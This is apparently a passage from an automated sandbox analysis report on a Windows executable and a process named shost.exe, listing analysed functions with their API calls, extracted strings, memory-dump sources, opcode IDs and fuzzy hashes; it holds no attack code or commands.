Instruction Fuzzy Hash: F8214F31F18B9181E764AF12A45002AB6B4FB98BD1B484135DFDEA3BA9DF3CE4538704

Function 00007FF6CCCBD440 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6CCCB7F28,?,?,?,00007FF6CCCB9D35), ref: 00007FF6CCCBD44A
SetLastError.KERNEL32(?,?,?,00007FF6CCCB7F28,?,?,?,00007FF6CCCB9D35), ref: 00007FF6CCCBD4B2
SetLastError.KERNEL32(?,?,?,00007FF6CCCB7F28,?,?,?,00007FF6CCCB9D35), ref: 00007FF6CCCBD4C8
abort.LIBCMT ref: 00007FF6CCCBD4CE

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: ErrorLast$abort
String ID:
API String ID: 1447195878-0
Opcode ID: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
Instruction ID: 4623df6548d1f2329e5695dd82150f4320fbd486e5d770597e009aa2551921e8
Opcode Fuzzy Hash: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
Instruction Fuzzy Hash: BF018824F086C342FA58BFA1A67613851B15F44B92F0405B8EBAEC2BDAED2CF8458600

Function 00007FF6CCCA8590 Relevance: 6.0, APIs: 4, Instructions: 21COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6CCCA8598
GetDeviceCaps.GDI32 ref: 00007FF6CCCA85AE
GetDeviceCaps.GDI32 ref: 00007FF6CCCA85C2
ReleaseDC.USER32 ref: 00007FF6CCCA85D3

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
Instruction ID: 6db075c1d0f68fba211ebb801376638c1ae264325c8a43b97b8905b44482ea2b
Opcode Fuzzy Hash: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
Instruction Fuzzy Hash: 06E01260E0978283FF089FB1685A13621B0AF4AB83F08443DCE5FC6360DD3CA096C750

Function 00007FF6CCC8E34C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8E549

Strings

DXGIDebug.dll, xrefs: 00007FF6CCC8E35A

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: DXGIDebug.dll
API String ID: 3668304517-540382549
Opcode ID: c95a14f3e08432d20fa100b60a889192fdc82c8c31e8ee41ac2278623d50a91b
Instruction ID: 71b81cd2f8b2ce424a2b89ddcf50080c1423da831c0ed3a8378946d51f082d8c
Opcode Fuzzy Hash: c95a14f3e08432d20fa100b60a889192fdc82c8c31e8ee41ac2278623d50a91b
Instruction Fuzzy Hash: 7171AB72A14B8182EB14CF65E4443AEB3B8FB54798F444236DBAD87B95DF78E061C300

Function 00007FF6CCCBE1F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CCCBE237

Strings

gfff, xrefs: 00007FF6CCCBE362
e+000, xrefs: 00007FF6CCCBE2DF

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo
String ID: e+000$gfff
API String ID: 3215553584-3030954782
Opcode ID: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
Instruction ID: fc40279c400e70e02aa8eb1d1605418f4949be5bbcda472360be1885ad14877a
Opcode Fuzzy Hash: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
Instruction Fuzzy Hash: 9F51F462B187C286E7258FB599513696BA1EB81F91F089235CBECC7BD6CF2CE444C701

Function 00007FF6CCC99408 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CCC995A8: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6CCC995E6

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC9959C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC995A2

Strings

SIZE, xrefs: 00007FF6CCC99443

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn$swprintf
String ID: SIZE
API String ID: 449872665-3243624926
Opcode ID: 049592b23eccf18b91a3e94430bb7a89aa9f7458b84fc95e0ae4febadba54acb
Instruction ID: 7d946df67e473f0ce5b62e9bc76b5e1af5e804a2f45c38e20cba4af8e0c14bd5
Opcode Fuzzy Hash: 049592b23eccf18b91a3e94430bb7a89aa9f7458b84fc95e0ae4febadba54acb
Instruction Fuzzy Hash: 7B418F62A286C285EB10DF64E4453BE6370EF957A6F504331EBDD86AD6EE3DE540C700

Function 00007FF6CCCA9B40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CCC8255C: GetDlgItem.USER32 ref: 00007FF6CCC825AC
Part of subcall function 00007FF6CCC8255C: SetDlgItemTextW.USER32 ref: 00007FF6CCC825C8

EndDialog.USER32 ref: 00007FF6CCCA9C24
SetDlgItemTextW.USER32 ref: 00007FF6CCCA9CAA

Strings

ASKNEXTVOL, xrefs: 00007FF6CCCA9B72

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: Item$Text$Dialog
String ID: ASKNEXTVOL
API String ID: 2638039312-3402441367
Opcode ID: df6f41e9741c0f8996d893104ea931d078e3acc76589f579c23b9fdb6368dbb8
Instruction ID: 802a8aa5b25355e5dcc4757e708a24da4166fb6b0da6a4fc9b5e24b346a1a13e
Opcode Fuzzy Hash: df6f41e9741c0f8996d893104ea931d078e3acc76589f579c23b9fdb6368dbb8
Instruction Fuzzy Hash: 50419222E18AC291FB109F16E5592BA23F1AF86BC6F144035DFCD87795CE3CE5518380

Function 00007FF6CCC99638 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

_snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6CCC996EA

Part of subcall function 00007FF6CCCA0F68: WideCharToMultiByte.KERNEL32 ref: 00007FF6CCCA0F99

Strings

$%s, xrefs: 00007FF6CCC996D7
@%s, xrefs: 00007FF6CCC996CE

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: ByteCharMultiWide_snwprintf
String ID: $%s$@%s
API String ID: 2650857296-834177443
Opcode ID: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
Instruction ID: 7a40e0c6937820fde464ac171c231d289e2f9717ec17926d970828f552f385cc
Opcode Fuzzy Hash: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
Instruction Fuzzy Hash: D031DE72B18AC696EB50CF66E4406E923B0FB54B89F401032EF8D97B95EE3DE506C740

Function 00007FF6CCCB0204 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00007FF6CCCB026F
DialogBoxParamW.USER32 ref: 00007FF6CCCB02A4

Strings

GETPASSWORD1, xrefs: 00007FF6CCCB029D

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: DialogParamVisibleWindow
String ID: GETPASSWORD1
API String ID: 3157717868-3292211884
Opcode ID: 3689008c5ae976a1f3a242e5b1eb30ef9737a63c20829ff4d7ba5964f065d3d0
Instruction ID: 265c4418c9c8ed20bd0416ebf28314f68c1281d0509486c7c133d00ce8ce2639
Opcode Fuzzy Hash: 3689008c5ae976a1f3a242e5b1eb30ef9737a63c20829ff4d7ba5964f065d3d0
Instruction Fuzzy Hash: 42318365A0CBC285EB008F51B8510B92B70BF46B86F480079DBCD83766CE2CE995C794

Function 00007FF6CCCBEB04 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF6CCCBEB76
GetFileType.KERNEL32 ref: 00007FF6CCCBEB8C

Strings

@, xrefs: 00007FF6CCCBEBB7

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: FileHandleType
String ID: @
API String ID: 3000768030-2766056989
Opcode ID: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
Instruction ID: e32556eabfad9e914c0dbf1c72e363e6ee253cbb23bb3a830db0fa5fabd0871f
Opcode Fuzzy Hash: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
Instruction Fuzzy Hash: EF217122A08AD281EB648F6994A01392671EB55B75F28133DD7EF877E4CE3DE881C345

Function 00007FF6CCCB4078 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6CCCB1D3E), ref: 00007FF6CCCB40BC
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6CCCB1D3E), ref: 00007FF6CCCB4102

Strings

csm, xrefs: 00007FF6CCCB40EF

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
Instruction ID: 8c4b2dbbb2fff3513959ee4f86347793bd8f0546d77565d35ba5fd07374153ff
Opcode Fuzzy Hash: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
Instruction Fuzzy Hash: 63111332608B9182EA208F15F45026AB7B1FB88B95F184231EFCD47B68DF3CD556CB00

Function 00007FF6CCC9EA5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6CCC9E95F,?,?,?,00007FF6CCC9463A,?,?,?), ref: 00007FF6CCC9EA63
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6CCC9E95F,?,?,?,00007FF6CCC9463A,?,?,?), ref: 00007FF6CCC9EA6E

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00007FF6CCC9EA78

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: ErrorLastObjectSingleWait
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1211598281-2248577382
Opcode ID: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
Instruction ID: fceb7f773bedc69419d0c2c27d92c792a50608bf2657031f7eb86ca7e6f9dc62
Opcode Fuzzy Hash: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
Instruction Fuzzy Hash: 89E01A31E1988381F600AF219C8647922707F62772F900331D2BEC11F59F2CA98AC340

Function 00007FF6CCC9A43C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6CCC9A447
FindResourceW.KERNEL32 ref: 00007FF6CCC9A45D

Strings

RTL, xrefs: 00007FF6CCC9A453

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
Instruction ID: bdda5d79df42ac1c1938b9f9f5a423dd702a6fa96571dadb26d52681fb2e7b26
Opcode Fuzzy Hash: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
Instruction Fuzzy Hash: 7ED05E91F0968282FF196F71A48937522B05F1CB43F485038CA8EC6390EE2DD0C8C750

Analysis Process: shost.exePID: 744, Parent PID: 1892COMMON

Executed Functions

Function 07D11B55 Relevance: 5.5, Instructions: 5513COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2589306758.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf8e02a5bd84b62d72a025b6f0bf864781fa48da130821719f68ab539ba34fe0
Instruction ID: 5b705991f6a4542a037c18c7f23f3dea14ead61731fd2e423579d259741c5125
Opcode Fuzzy Hash: bf8e02a5bd84b62d72a025b6f0bf864781fa48da130821719f68ab539ba34fe0
Instruction Fuzzy Hash: 1BB31570A156188FCB18EF38D9996ACBBB2FB89311F0049E9D049A7360DF385D95CF46

Function 07D11B80 Relevance: 5.5, Instructions: 5499COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2589306758.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6983932979c3d7cf9259e45adcde1dca21b757f6a837cf8491217e2d6cab9b8
Instruction ID: a3e538185f74784198b6daf5afebe26dd28e60e0f70f83f1f49805ba016934f0
Opcode Fuzzy Hash: d6983932979c3d7cf9259e45adcde1dca21b757f6a837cf8491217e2d6cab9b8
Instruction Fuzzy Hash: 88B31570A156188FCB18EF38D9996ACBBB2FB89311F0049E9D049A7360DF385D95CF42

Function 07D10864 Relevance: 3.9, Strings: 3, Instructions: 118COMMON

Download Yara Rule

Strings

@, xrefs: 07D1086C
Te]q, xrefs: 07D10977
TJbq, xrefs: 07D1098C

Memory Dump Source

Source File: 0000000B.00000002.2589306758.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false

Similarity

API ID:
String ID: @$TJbq$Te]q
API String ID: 0-2800237591
Opcode ID: 92362b15fb9467ffc0b76d0d7b063122f953a9620755b16dfab86578877864bb
Instruction ID: d8363d15a780c5b1a33447fa61a0841a6c90619aaac6b9364e7e4adb175060e4
Opcode Fuzzy Hash: 92362b15fb9467ffc0b76d0d7b063122f953a9620755b16dfab86578877864bb
Instruction Fuzzy Hash: 4B41689160E3D14FD703A73858246597FB2AF97115B1E41DBD0C6CF6E3C9598C0A83A6

Function 07D10970 Relevance: 2.5, Strings: 2, Instructions: 43COMMON

Download Yara Rule

Strings

Te]q, xrefs: 07D10977
TJbq, xrefs: 07D1098C

Memory Dump Source

Source File: 0000000B.00000002.2589306758.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false

Similarity

API ID:
String ID: TJbq$Te]q
API String ID: 0-3147309840
Opcode ID: e68c33b9ad65582049b227c8b2b06724aa5a130e946a913b93f231aa6bcd468b
Instruction ID: 3bb836b4d1ce9822ebfe436756b29448a77650d77304d8b9f5eb38fe4661c142
Opcode Fuzzy Hash: e68c33b9ad65582049b227c8b2b06724aa5a130e946a913b93f231aa6bcd468b
Instruction Fuzzy Hash: 1AF0F6757000214FCA09AB7DA45893E77DBAFC9A21316005EE40ADB3A5CE60DC0747A6

Function 07D10007 Relevance: 1.8, Strings: 1, Instructions: 551COMMON

Download Yara Rule

Strings

Te]q, xrefs: 07D1057B

Memory Dump Source

Source File: 0000000B.00000002.2589306758.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: 6be44e892dcc84dc1de34c9dec32fd17ff21be9362cca5a603680590de6b1966
Instruction ID: d08198f4485619bd71eddf24241244987016329534c4cce9a7a7055282e6e965
Opcode Fuzzy Hash: 6be44e892dcc84dc1de34c9dec32fd17ff21be9362cca5a603680590de6b1966
Instruction Fuzzy Hash: FD127C70B142199FDB04BBB8D89966DBBF6FB88318F504869E049E7350DE3C9C46CB52

Function 07D10040 Relevance: 1.8, Strings: 1, Instructions: 526COMMON

Download Yara Rule

Strings

Te]q, xrefs: 07D1057B

Memory Dump Source

Source File: 0000000B.00000002.2589306758.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: 073744b89a64f34305b48548c621e9e240466cc8db3b1b5c922f7fab84fa6aa8
Instruction ID: d1a2d97497b2eff2a40b85b3da558dc24e1d3c366742847b330adaff4a5257d7
Opcode Fuzzy Hash: 073744b89a64f34305b48548c621e9e240466cc8db3b1b5c922f7fab84fa6aa8
Instruction Fuzzy Hash: 38127E70B142199BDB04BBBCD89966DBBF6FB88304F504929E049E7350DE3C9C46CB52

Function 07D1C990 Relevance: 1.5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

Strings

4']q, xrefs: 07D1CAEB

Memory Dump Source

Source File: 0000000B.00000002.2589306758.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 290b3034cab7fd0c0f24ac516282020de4bca83440b10c4542fa9be940b95394
Instruction ID: 97800dd49aea8790237bd7528f83cf00083141fb88f59179eed4a9dff542ef7d
Opcode Fuzzy Hash: 290b3034cab7fd0c0f24ac516282020de4bca83440b10c4542fa9be940b95394
Instruction Fuzzy Hash: 71A19370B241169FCB04EBB9E85563EBBB6EF89304F448525D449E7354DA3CEC06CBA2

Function 07D1AF80 Relevance: .5, Instructions: 526COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2589306758.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcc7317baae32dd126182756e43c4b9da1366f4ac9783a4dd41943413146069
Instruction ID: b5c86729379c1fc5471672aba11ae832490be2bf89cf7138a30ae2f13d166c24
Opcode Fuzzy Hash: 6bcc7317baae32dd126182756e43c4b9da1366f4ac9783a4dd41943413146069
Instruction Fuzzy Hash: 6B127FB0A14218DBCB14BFB8E94966DBBF6FB8C340F50486AD449E3354EE385D86CB51

Function 07D193E8 Relevance: .4, Instructions: 413COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2589306758.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab6c4a9f9c3f6ced4d41a91009da730b0795fac56a7915c49c692c765e43581c
Instruction ID: 75a7e374e1ad4b320ae00b63fb65858ef076a709713971f054e2ca73c73edbf1
Opcode Fuzzy Hash: ab6c4a9f9c3f6ced4d41a91009da730b0795fac56a7915c49c692c765e43581c
Instruction Fuzzy Hash: 84E1B371A14115DBC704FBB8E9A963EBBBAEB88314F404979D449E3350DE3CAC46C792

Function 07D1C705 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2589306758.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce53b1d6768dd787121d9206c521eacc004af09f8f65845c2bc744a02c54be44
Instruction ID: 260396e607248d9ced2649058e9f58cdd322fb6b2c0a30dc7c04035c8feefebe
Opcode Fuzzy Hash: ce53b1d6768dd787121d9206c521eacc004af09f8f65845c2bc744a02c54be44
Instruction Fuzzy Hash: 24514671B152019FC705FBB8E88562EBFB6EF89210F44456AD048E7391DE3C9C06C7A2

Function 07D1C740 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2589306758.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffe83afe7558dc313b71e7ac0850c38b2a2aa79ab060bf72b788c426d84eb9fa
Instruction ID: 662b054bf4ef879fd62d899a30760493283489b5fcc2d62ebda1442bb455ce89
Opcode Fuzzy Hash: ffe83afe7558dc313b71e7ac0850c38b2a2aa79ab060bf72b788c426d84eb9fa
Instruction Fuzzy Hash: 3E51A071B242159BC704FBB8E98562EBBF6EB88614F404539D449F3354EE3CAC4687A2

Function 07D1C5EC Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2589306758.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1aaadb9576c395d56dcfb44cf0269742ee65f6e03b602d86525a50a650c80b6
